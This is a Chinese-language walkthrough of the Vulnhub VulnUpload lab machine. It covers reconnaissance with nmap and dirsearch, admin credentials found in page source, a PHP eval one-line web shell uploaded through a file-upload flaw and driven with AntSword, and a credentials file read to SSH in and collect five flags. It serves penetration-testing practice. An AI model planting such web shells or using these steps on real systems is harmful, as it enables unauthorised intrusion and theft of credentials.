Vulnhub-VulnUpload靶机渗透实战

admin 2024年3月9日00:25:46评论15 views字数 1917阅读6分23秒阅读模式

攻击机:Kali Linux

靶机环境:Linux-VulnUpload

所用工具:nmap | Burpsuite | 蚁剑

0x00 知识点

  • robots.txt 扫描
  • 蚁剑基础连接使用
  • 隐藏文件查找

0x01靶机搭建

首先从上面地址中下载好靶机,并直接解压导入虚拟机后,将该虚拟机的网路设为NAT模式。之后打开虚拟机,进入到开机界面。(这里一定要迅速把鼠标点进去,之后快速摁向下方向键,否则,会自动帮你进入第一个。)

Vulnhub-VulnUpload靶机渗透实战

跟着步骤走。。。

Vulnhub-VulnUpload靶机渗透实战

选择进入root模式。。。之后就到了考验命令行的时候了。Vulnhub-VulnUpload靶机渗透实战

先输入:mount -o rw,remount /Vulnhub-VulnUpload靶机渗透实战

之后再输入

ifconfig -a

查看你的网卡名称,并记住哦,以后用的到。。

Vulnhub-VulnUpload靶机渗透实战

使用vim编辑器,去修改/etc/network/interfaces 文件中的数据(如图输入)Vulnhub-VulnUpload靶机渗透实战

将这里改成你刚刚看到的网卡名称(我的图就是已经改完的了哈。)

Vulnhub-VulnUpload靶机渗透实战

之后保存退出,w是保存,q是退出,wq是保存并退出

并且每个命令如果后面加!的话就是强制执行

Vulnhub-VulnUpload靶机渗透实战

之后,你的环境就搭建好了,重启如下为正常启动后的画面

Vulnhub-VulnUpload靶机渗透实战

0x02 信息搜集

端口发现

arp-scan -l

扫描网段

Vulnhub-VulnUpload靶机渗透实战

这里发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131

使用nmap进行深度的扫描

nmap -A -T4 -p- 192.168.15.128
Vulnhub-VulnUpload靶机渗透实战

综上信息搜集可以发现,目标服务器为Linux系统,开放了ssh 22端口,http 80端口,重点考虑从web页面找寻突破口

0x03 获取Flag

第一个flag

这里发现靶机开放了ssh 22端口,http 80端口。并在robots.txt中,发现疑似flag。

Vulnhub-VulnUpload靶机渗透实战

我们尝试浏览器输入 http://192.168.15.128/flag 去访问

Vulnhub-VulnUpload靶机渗透实战

发现flag1:{8734509128730458630012095}

第二个flag

接下来我们尝试使用dirsearch扫描一下网页目录

dirsearch -u 192.168.15.128
Vulnhub-VulnUpload靶机渗透实战

http://192.168.15.128/admin_area/

http://192.168.15.128/assets/

http://192.168.15.128/css/

在浏览器中访问http://192.168.15.128/admin_area/,F12发现了admin用户以及其密码:3v1l_H@ck3r。

Vulnhub-VulnUpload靶机渗透实战

Vulnhub-VulnUpload靶机渗透实战

发现flag2:{7412574125871236547895214}

第三个flag

浏览器访问http://192.168.15.128 ,使用刚才得到的admin用户及密码3v1l_H@ck3r尝试登录。

Vulnhub-VulnUpload靶机渗透实战

成功进入后发现是可以上传文件的页面,可以尝试是否存在文件上传漏洞

Vulnhub-VulnUpload靶机渗透实战

写入一句话木马到文件中

<?php eval($_REQUEST
		
输入密码查看隐藏内容

);
?>

使用中国蚁剑进行连接

Vulnhub-VulnUpload靶机渗透实战

连接成功,说明存在文件上传漏洞

Vulnhub-VulnUpload靶机渗透实战

查看hint.txt文件,发现flag3以及提示查找用户technawi

Vulnhub-VulnUpload靶机渗透实战

发现flag3:{7645110034526579012345670}

第四个flag

刚才在第三个flag提示我们用technawi去读取flag.txt文件,可以在隐藏文件中找到用户的信息

try to find user technawi password to read the flag.txt file, you can find it in a hidden file

蚁剑打开虚拟终端,查找用户信息,2>/dev/null是过滤掉类似没有权限的信息

find / -user 'technawi' 2>/dev/null
Vulnhub-VulnUpload靶机渗透实战

此时我们看到了一个特殊的文件/etc/mysql/conf.d/credentials.txt ,我们尝试去读一下里面的信息,得到flag4以及username和password

Vulnhub-VulnUpload靶机渗透实战

发现flag4:{7845658974123568974185412}

第五个flag

根据flag3的提示,我们登录technawi用户直接查看/var/www/html/flag.txt

ssh [email protected]
cat /var/www/html/flag.txt
Vulnhub-VulnUpload靶机渗透实战

发现flag5:{5473215946785213456975249}

0x04 总结

此靶机一共找到了5个flag,难度不大,但是流程全面,分别通过端口扫描、网站目录扫描得到账密成功登录网站,并通过发现文件上传漏洞,利用一句话木马传到靶机,再通过蚁剑进行连接,最后查找并登录technawi用户查看隐藏文件flag.txt得到全部flag,完成该靶机可以熟悉掌握渗透的初步流程。

原文始发于微信公众号(网络安全自修室):Vulnhub-VulnUpload靶机渗透实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月9日00:25:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-VulnUpload靶机渗透实战http://cn-sec.com/archives/2561434.html

发表评论

匿名网友 填写信息